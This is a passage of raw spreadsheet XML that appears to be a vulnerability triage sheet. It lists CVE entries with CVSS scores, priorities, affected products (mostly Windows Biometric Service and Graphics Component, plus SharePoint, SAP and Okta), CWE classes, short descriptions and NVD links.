t="inlineStr"><is><t>NVD</t></is></c><c r="O687" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P687" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q687" s="5" t="inlineStr" /><c r="R687" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S687" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t></is></c></row><row r="688"><c r="A688" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B688" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C688" s="5" t="inlineStr"><is><t>CVE-2026-83978</t></is></c><c r="D688" s="5" t="n"><v>7.8</v></c><c r="E688" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F688" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G688" s="5" t="inlineStr" /><c r="H688" s="5" t="n"><v>0.003</v></c><c r="I688" s="5" t="inlineStr" /><c r="J688" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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8" s="5" t="inlineStr" /><c r="M688" s="5" t="inlineStr" /><c r="N688" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O688" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P688" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q688" s="5" t="inlineStr" /><c r="R688" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S688" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t></is></c></row><row r="689"><c r="A689" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B689" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C689" s="5" t="inlineStr"><is><t>CVE-2026-83979</t></is></c><c r="D689" s="5" t="n"><v>7.8</v></c><c r="E689" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F689" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G689" s="5" t="inlineStr" /><c r="H689" s="5" t="n"><v>0.003</v></c><c r="I689" s="5" t="inlineStr" /><c r="J689" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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9" s="5" t="inlineStr" /><c r="M689" s="5" t="inlineStr" /><c r="N689" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O689" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P689" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q689" s="5" t="inlineStr" /><c r="R689" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S689" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t></is></c></row><row r="690"><c r="A690" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B690" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C690" s="5" t="inlineStr"><is><t>CVE-2026-83980</t></is></c><c r="D690" s="5" t="n"><v>7.8</v></c><c r="E690" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F690" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G690" s="5" t="inlineStr" /><c r="H690" s="5" t="n"><v>0.003</v></c><c r="I690" s="5" t="inlineStr" /><c r="J690" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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0" s="5" t="inlineStr" /><c r="M690" s="5" t="inlineStr" /><c r="N690" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O690" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P690" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q690" s="5" t="inlineStr" /><c r="R690" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S690" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t></is></c></row><row r="691"><c r="A691" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B691" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C691" s="5" t="inlineStr"><is><t>CVE-2026-83981</t></is></c><c r="D691" s="5" t="n"><v>7.8</v></c><c r="E691" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F691" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G691" s="5" t="inlineStr" /><c r="H691" s="5" t="n"><v>0.003</v></c><c r="I691" s="5" t="inlineStr" /><c r="J691" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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1" s="5" t="inlineStr" /><c r="M691" s="5" t="inlineStr" /><c r="N691" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O691" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P691" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q691" s="5" t="inlineStr" /><c r="R691" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S691" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t></is></c></row><row r="692"><c r="A692" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B692" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C692" s="5" t="inlineStr"><is><t>CVE-2026-83982</t></is></c><c r="D692" s="5" t="n"><v>7.8</v></c><c r="E692" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F692" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G692" s="5" t="inlineStr" /><c r="H692" s="5" t="n"><v>0.003</v></c><c r="I692" s="5" t="inlineStr" /><c r="J692" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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2" s="5" t="inlineStr" /><c r="M692" s="5" t="inlineStr" /><c r="N692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O692" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P692" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q692" s="5" t="inlineStr" /><c r="R692" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S692" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t></is></c></row><row r="693"><c r="A693" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B693" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C693" s="5" t="inlineStr"><is><t>CVE-2026-83983</t></is></c><c r="D693" s="5" t="n"><v>7.8</v></c><c r="E693" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F693" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G693" s="5" t="inlineStr" /><c r="H693" s="5" t="n"><v>0.003</v></c><c r="I693" s="5" t="inlineStr" /><c r="J693" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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3" s="5" t="inlineStr" /><c r="M693" s="5" t="inlineStr" /><c r="N693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O693" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P693" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q693" s="5" t="inlineStr" /><c r="R693" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S693" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t></is></c></row><row r="694"><c r="A694" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B694" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C694" s="5" t="inlineStr"><is><t>CVE-2026-83985</t></is></c><c r="D694" s="5" t="n"><v>7.8</v></c><c r="E694" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F694" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G694" s="5" t="inlineStr" /><c r="H694" s="5" t="n"><v>0.003</v></c><c r="I694" s="5" t="inlineStr" /><c r="J694" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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4" s="5" t="inlineStr" /><c r="M694" s="5" t="inlineStr" /><c r="N694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O694" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P694" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q694" s="5" t="inlineStr" /><c r="R694" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S694" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t></is></c></row><row r="695"><c r="A695" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B695" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C695" s="5" t="inlineStr"><is><t>CVE-2026-83986</t></is></c><c r="D695" s="5" t="n"><v>7.8</v></c><c r="E695" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F695" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G695" s="5" t="inlineStr" /><c r="H695" s="5" t="n"><v>0.003</v></c><c r="I695" s="5" t="inlineStr" /><c r="J695" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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5" s="5" t="inlineStr" /><c r="M695" s="5" t="inlineStr" /><c r="N695" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O695" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P695" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q695" s="5" t="inlineStr" /><c r="R695" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S695" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T695" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t></is></c></row><row r="696"><c r="A696" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B696" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C696" s="5" t="inlineStr"><is><t>CVE-2026-83987</t></is></c><c r="D696" s="5" t="n"><v>7.8</v></c><c r="E696" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F696" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G696" s="5" t="inlineStr" /><c r="H696" s="5" t="n"><v>0.003</v></c><c r="I696" s="5" t="inlineStr" /><c r="J696" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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6" s="5" t="inlineStr" /><c r="M696" s="5" t="inlineStr" /><c r="N696" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O696" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P696" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q696" s="5" t="inlineStr" /><c r="R696" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S696" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T696" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t></is></c></row><row r="697"><c r="A697" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B697" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C697" s="5" t="inlineStr"><is><t>CVE-2026-83988</t></is></c><c r="D697" s="5" t="n"><v>7.8</v></c><c r="E697" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F697" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G697" s="5" t="inlineStr" /><c r="H697" s="5" t="n"><v>0.003</v></c><c r="I697" s="5" t="inlineStr" /><c r="J697" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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7" s="5" t="inlineStr" /><c r="M697" s="5" t="inlineStr" /><c r="N697" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O697" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P697" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q697" s="5" t="inlineStr" /><c r="R697" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S697" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T697" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t></is></c></row><row r="698"><c r="A698" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B698" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C698" s="5" t="inlineStr"><is><t>CVE-2026-83990</t></is></c><c r="D698" s="5" t="n"><v>7.8</v></c><c r="E698" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F698" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G698" s="5" t="inlineStr" /><c r="H698" s="5" t="n"><v>0.003</v></c><c r="I698" s="5" t="inlineStr" /><c r="J698" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K698" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L698" s="5" t="inlineStr" /><c r="M698" s="5" t="inlineStr" /><c r="N698" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O698" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P698" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q698" s="5" t="inlineStr" /><c r="R698" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S698" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T698" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t></is></c></row><row r="699"><c r="A699" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B699" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C699" s="5" t="inlineStr"><is><t>CVE-2026-83995</t></is></c><c r="D699" s="5" t="n"><v>7.8</v></c><c r="E699" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F699" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G699" s="5" t="inlineStr" /><c r="H699" s="5" t="n"><v>0.003</v></c><c r="I699" s="5" t="inlineStr" /><c r="J699" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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99" s="5" t="inlineStr" /><c r="M699" s="5" t="inlineStr" /><c r="N699" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O699" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P699" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q699" s="5" t="inlineStr" /><c r="R699" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S699" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T699" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t></is></c></row><row r="700"><c r="A700" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B700" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C700" s="5" t="inlineStr"><is><t>CVE-2026-84000</t></is></c><c r="D700" s="5" t="n"><v>7.8</v></c><c r="E700" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F700" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G700" s="5" t="inlineStr" /><c r="H700" s="5" t="n"><v>0.003</v></c><c r="I700" s="5" t="inlineStr" /><c r="J700" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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00" s="5" t="inlineStr" /><c r="M700" s="5" t="inlineStr" /><c r="N700" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O700" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P700" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q700" s="5" t="inlineStr" /><c r="R700" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S700" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t></is></c><c r="T700" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t></is></c></row><row r="701"><c r="A701" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B701" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C701" s="5" t="inlineStr"><is><t>CVE-2026-85983</t></is></c><c r="D701" s="5" t="n"><v>7.8</v></c><c r="E701" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F701" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G701" s="5" t="inlineStr" /><c r="H701" s="5" t="n"><v>0.001</v></c><c r="I701" s="5" t="inlineStr" /><c r="J701" s="5" t="inlineStr" /><c r="K701" s="5" t="inlineStr" /><c r="L701" s="5" t="inlineStr" /><c r="M701" s="5" t="inlineStr" /><c r="N701" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O701" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P701" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q701" s="5" t="inlineStr" /><c r="R701" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S701" s="5" t="inlineStr"><is><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is></c><c r="T701" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t></is></c></row><row r="702"><c r="A702" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B702" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C702" s="5" t="inlineStr"><is><t>CVE-2026-9034</t></is></c><c r="D702" s="5" t="n"><v>7.8</v></c><c r="E702" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F702" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G702" s="5" t="inlineStr" /><c r="H702" s="5" t="n"><v>0.001</v></c><c r="I702" s="5" t="inlineStr" /><c r="J702" s="5" t="inlineStr" /><c r="K702" s="5" t="inlineStr" /><c r="L702" s="5" t="inlineStr" /><c r="M702" s="5" t="inlineStr" /><c r="N702" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O702" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P702" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q702" s="5" t="inlineStr" /><c r="R702" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S702" s="5" t="inlineStr"><is><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is></c><c r="T702" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t></is></c></row><row r="703"><c r="A703" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B703" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C703" s="5" t="inlineStr"><is><t>CVE-2026-19397</t></is></c><c r="D703" s="5" t="n"><v>7.7</v></c><c r="E703" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F703" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G703" s="5" t="inlineStr" /><c r="H703" s="5" t="n"><v>0.002</v></c><c r="I703" s="5" t="inlineStr" /><c r="J703" s="5" t="inlineStr" /><c r="K703" s="5" t="inlineStr" /><c r="L703" s="5" t="inlineStr" /><c r="M703" s="5" t="inlineStr" /><c r="N703" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O703" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P703" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q703" s="5" t="inlineStr" /><c r="R703" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S703" s="5" t="inlineStr"><is><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is></c><c r="T703" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t></is></c></row><row r="704"><c r="A704" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B704" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C704" s="5" t="inlineStr"><is><t>CVE-2026-66767</t></is></c><c r="D704" s="5" t="n"><v>7.7</v></c><c r="E704" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F704" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G704" s="5" t="inlineStr" /><c r="H704" s="5" t="n"><v>0.003</v></c><c r="I704" s="5" t="inlineStr" /><c r="J704" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K704" s="5" t="inlineStr" /><c r="L704" s="5" t="inlineStr" /><c r="M704" s="5" t="inlineStr" /><c r="N704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O704" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P704" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q704" s="5" t="inlineStr" /><c r="R704" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S704" s="5" t="inlineStr"><is><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is></c><c r="T704" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t></is></c></row><row r="705"><c r="A705" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B705" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C705" s="5" t="inlineStr"><is><t>CVE-2026-69683</t></is></c><c r="D705" s="5" t="n"><v>7.7</v></c><c r="E705" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G705" s="5" t="inlineStr" /><c r="H705" s="5" t="n"><v>0.008</v></c><c r="I705" s="5" t="inlineStr" /><c r="J705" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K705" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L705" s="5" t="inlineStr" /><c r="M705" s="5" t="inlineStr" /><c r="N705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O705" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P705" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q705" s="5" t="inlineStr" /><c r="R705" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S705" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T705" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t></is></c></row><row r="706"><c r="A706" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B706" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C706" s="5" t="inlineStr"><is><t>CVE-2026-73315</t></is></c><c r="D706" s="5" t="n"><v>7.7</v></c><c r="E706" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F706" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G706" s="5" t="inlineStr" /><c r="H706" s="5" t="n"><v>0.003</v></c><c r="I706" s="5" t="inlineStr" /><c r="J706" s="5" t="inlineStr" /><c r="K706" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L706" s="5" t="inlineStr" /><c r="M706" s="5" t="inlineStr" /><c r="N706" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O706" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P706" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q706" s="5" t="inlineStr" /><c r="R706" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S706" s="5" t="inlineStr"><is><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is></c><c r="T706" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t></is></c></row><row r="707"><c r="A707" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B707" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C707" s="5" t="inlineStr"><is><t>CVE-2026-77909</t></is></c><c r="D707" s="5" t="n"><v>7.7</v></c><c r="E707" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F707" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G707" s="5" t="inlineStr" /><c r="H707" s="5" t="n"><v>0.006</v></c><c r="I707" s="5" t="inlineStr" /><c r="J707" s="5" t="inlineStr" /><c r="K707" s="5" t="inlineStr" /><c r="L707" s="5" t="inlineStr" /><c r="M707" s="5" t="inlineStr" /><c r="N707" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q707" s="5" t="inlineStr" /><c r="R707" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S707" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t></is></c><c r="T707" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t></is></c></row><row r="708"><c r="A708" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B708" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C708" s="5" t="inlineStr"><is><t>CVE-2026-78623</t></is></c><c r="D708" s="5" t="n"><v>7.7</v></c><c r="E708" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F708" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G708" s="5" t="inlineStr" /><c r="H708" s="5" t="n"><v>0.002</v></c><c r="I708" s="5" t="inlineStr" /><c r="J708" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K708" s="5" t="inlineStr" /><c r="L708" s="5" t="inlineStr" /><c r="M708" s="5" t="inlineStr" /><c r="N708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O708" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P708" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q708" s="5" t="inlineStr" /><c r="R708" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S708" s="5" t="inlineStr"><is><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is></c><c r="T708" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t></is></c></row><row r="709"><c r="A709" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B709" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C709" s="5" t="inlineStr"><is><t>CVE-2026-82537</t></is></c><c r="D709" s="5" t="n"><v>7.7</v></c><c r="E709" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F709" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G709" s="5" t="inlineStr" /><c r="H709" s="5" t="n"><v>0.003</v></c><c r="I709" s="5" t="inlineStr" /><c r="J709" s="5" t="inlineStr" /><c r="K709" s="5" t="inlineStr" /><c r="L709" s="5" t="inlineStr" /><c r="M709" s="5" t="inlineStr" /><c r="N709" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O709" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P709" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q709" s="5" t="inlineStr" /><c r="R709" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S709" s="5" t="inlineStr"><is><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is></c><c r="T709" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t></is></c></row><row r="710"><c r="A710" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B710" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C710" s="5" t="inlineStr"><is><t>CVE-2026-9040</t></is></c><c r="D710" s="5" t="n"><v>7.7</v></c><c r="E710" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F710" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G710" s="5" t="inlineStr" /><c r="H710" s="5" t="n"><v>0.001</v></c><c r="I710" s="5" t="inlineStr" /><c r="J710" s="5" t="inlineStr" /><c r="K710" s="5" t="inlineStr" /><c r="L710" s="5" t="inlineStr" /><c r="M710" s="5" t="inlineStr" /><c r="N710" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O710" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P710" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q710" s="5" t="inlineStr" /><c r="R710" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S710" s="5" t="inlineStr"><is><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is></c><c r="T710" s="6" 